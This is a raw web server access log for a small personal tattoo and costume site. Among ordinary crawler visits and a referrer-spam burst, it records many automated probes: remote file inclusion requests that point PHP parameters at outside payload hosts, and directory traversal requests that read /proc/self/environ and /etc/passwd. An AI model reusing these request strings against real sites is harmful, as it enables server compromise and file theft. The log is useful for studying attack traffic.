207.46.13.51 - - [04/May/2010:12:31:54 -0500] "GET /logs/access_log.1234569600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.14 - - [04/May/2010:12:33:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.23.15.24 - - [04/May/2010:12:33:55 -0500] "GET /logs/access_log.1272067200//admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.249.71.176 - - [04/May/2010:12:38:18 -0500] "GET /costume/?iframe=true&width=100%&height=100% HTTP/1.1" 200 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.131 - - [04/May/2010:12:38:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.190.102.21 - - [04/May/2010:12:40:21 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:12:40:21 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 4248 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:12:40:22 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.129.119.42 - - [04/May/2010:12:42:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
118.217.216.132 - - [04/May/2010:12:43:19 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
118.217.216.132 - - [04/May/2010:12:43:20 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
118.217.216.132 - - [04/May/2010:12:43:21 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
87.250.255.243 - - [04/May/2010:12:47:47 -0500] "GET /logs/access_log.1272067200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.11 - - [04/May/2010:12:49:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.99.235.133 - - [04/May/2010:12:51:42 -0500] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4241 "-""libwww-perl/5.834"
65.99.235.133 - - [04/May/2010:12:51:42 -0500] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
216.129.119.13 - - [04/May/2010:12:52:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.183 - - [04/May/2010:12:52:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.194.38 - - [04/May/2010:12:55:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.38 - - [04/May/2010:12:55:10 -0500] "GET /costume/costume57%20copy.JPG HTTP/1.1" 200 16878 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
80.71.1.68 - - [04/May/2010:12:57:30 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.218.116.134 - - [04/May/2010:12:58:02 -0500] "GET /logs/access_log.1242432000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [04/May/2010:12:58:28 -0500] "GET /logs/access_log.1159833600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.71.1.68 - - [04/May/2010:12:59:10 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 4246 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:12:59:14 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
207.46.13.43 - - [04/May/2010:12:59:53 -0500] "GET /logs/access_log.1179014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.13.242.67 - - [04/May/2010:13:00:34 -0500] "POST /logs//help.php HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NetCaptor 7.0.2 Final; .NET CLR 1.0.3705)"
212.47.221.153 - - [04/May/2010:13:00:41 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
207.46.199.48 - - [04/May/2010:13:01:23 -0500] "GET /logs/access_log.1266364800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.71.1.68 - - [04/May/2010:13:01:42 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:13:01:42 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:13:01:43 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 4246 "-""libwww-perl/5.805"
211.174.185.131 - - [04/May/2010:13:03:09 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:03:09 -0500] "GET /logs/access_log.1237420800//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:03:09 -0500] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.47.221.153 - - [04/May/2010:13:04:26 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
212.47.221.153 - - [04/May/2010:13:04:27 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
80.71.1.68 - - [04/May/2010:13:06:17 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:13:06:18 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:13:06:18 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 4246 "-""libwww-perl/5.805"
211.174.185.131 - - [04/May/2010:13:07:28 -0500] "GET /logs/access_log.1237420800%20%20//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
86.80.140.112 - - [04/May/2010:13:08:04 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.nl/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=nl&start=152&sig2=jJxAJeQriaVNqcJ565x4uQ&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D147%26hl%3Dnl%26sa%3DN%26gbv%3D2%26ndsp%3D21%26tbs%3Disch:1&ei=fWLgS9PLDYTf-Qax8LigBw""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:05 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:05 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:05 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:05 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:05 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:06 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 206 62218 "http://images.google.nl/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=nl&start=152&sig2=jJxAJeQriaVNqcJ565x4uQ&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%26start%3D147%26hl%3Dnl%26sa%3DN%26gbv%3D2%26ndsp%3D21%26tbs%3Disch:1&ei=fWLgS9PLDYTf-Qax8LigBw""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:09 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:09 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:09 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.80.140.112 - - [04/May/2010:13:08:09 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
211.174.185.131 - - [04/May/2010:13:09:30 -0500] "GET /logs/access_log.1265760000//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:09:30 -0500] "GET /logs/access_log.1265155200//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:10:31 -0500] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:10:31 -0500] "GET /logs/access_log.1237420800//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
211.174.185.131 - - [04/May/2010:13:10:31 -0500] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:13:10:47 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.12 - - [04/May/2010:13:11:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.174.185.131 - - [04/May/2010:13:13:57 -0500] "GET /logs/access_log.1237420800%20%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
212.47.221.153 - - [04/May/2010:13:15:09 -0500] "GET /logs/access_log.1237852800/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
212.47.221.153 - - [04/May/2010:13:15:09 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
212.47.221.153 - - [04/May/2010:13:15:10 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
211.174.185.131 - - [04/May/2010:13:15:54 -0500] "GET /logs/access_log.1265760000//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:13:20:05 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.210.205 - - [04/May/2010:13:24:15 -0500] "GET /index.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
98.225.11.54 - - [04/May/2010:13:27:24 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://www.chicagodefender.com/blog-5144-xanax-next-day-no-prescription.html""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
24.131.155.104 - - [04/May/2010:13:27:26 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
98.225.11.54 - - [04/May/2010:13:27:27 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
24.20.211.213 - - [04/May/2010:13:27:33 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
98.225.11.54 - - [04/May/2010:13:27:43 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
71.60.107.21 - - [04/May/2010:13:27:45 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
82.114.92.194 - - [04/May/2010:13:27:49 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
68.102.173.141 - - [04/May/2010:13:28:02 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
68.47.173.173 - - [04/May/2010:13:28:06 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
200.55.239.31 - - [04/May/2010:13:28:16 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
68.51.189.125 - - [04/May/2010:13:28:23 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
202.63.101.227 - - [04/May/2010:13:28:27 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
24.8.209.59 - - [04/May/2010:13:28:32 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
71.200.237.177 - - [04/May/2010:13:28:35 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
68.46.19.168 - - [04/May/2010:13:28:37 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
24.8.209.59 - - [04/May/2010:13:28:43 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
68.46.19.168 - - [04/May/2010:13:28:46 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
77.27.98.79 - - [04/May/2010:13:29:07 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
24.131.155.104 - - [04/May/2010:13:29:12 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
67.218.116.163 - - [04/May/2010:13:29:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.225.11.54 - - [04/May/2010:13:29:35 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
161.139.152.3 - - [04/May/2010:13:29:37 -0500] "GET /logs/access_log.1216339200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216339200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
161.139.152.3 - - [04/May/2010:13:30:02 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
87.250.255.243 - - [04/May/2010:13:32:10 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.188 - - [04/May/2010:13:32:24 -0500] "GET /logs/access_log.1226361600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.91 - - [04/May/2010:13:34:23 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.210.205 - - [04/May/2010:13:36:51 -0500] "GET /logs/access_log.1270598400/index.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.210.205 - - [04/May/2010:13:36:51 -0500] "GET /index.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.210.205 - - [04/May/2010:13:36:51 -0500] "GET /logs/index.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
204.232.202.236 - - [04/May/2010:13:37:50 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:37:50 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:37:55 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:37:56 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:38:15 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:38:15 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:38:15 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:38:15 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
217.86.83.202 - - [04/May/2010:13:40:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.answers.com/main/ntquery?s=what+is+a+flash+tattoo&gwp=13""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729)"
217.86.83.202 - - [04/May/2010:13:40:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729)"
217.86.83.202 - - [04/May/2010:13:40:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729)"
217.86.83.202 - - [04/May/2010:13:40:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729)"
204.232.202.236 - - [04/May/2010:13:40:55 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:40:58 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:40:58 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:41:01 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
99.39.2.249 - - [04/May/2010:13:42:50 -0500] "GET //index.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.204.232 - - [04/May/2010:13:42:53 -0500] "GET /logs/access_log.1167177600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:13:43:02 -0500] "GET /artwork/ HTTP/1.1" 200 - "-""Yandex/1.01.001 (compatible; Win16; I)"
204.232.202.236 - - [04/May/2010:13:52:47 -0500] "GET /logs/access_log.1270857600/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:52:48 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:52:48 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:20 -0500] "GET /logs/access_log.1270857600/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""libwww-perl/5.808"
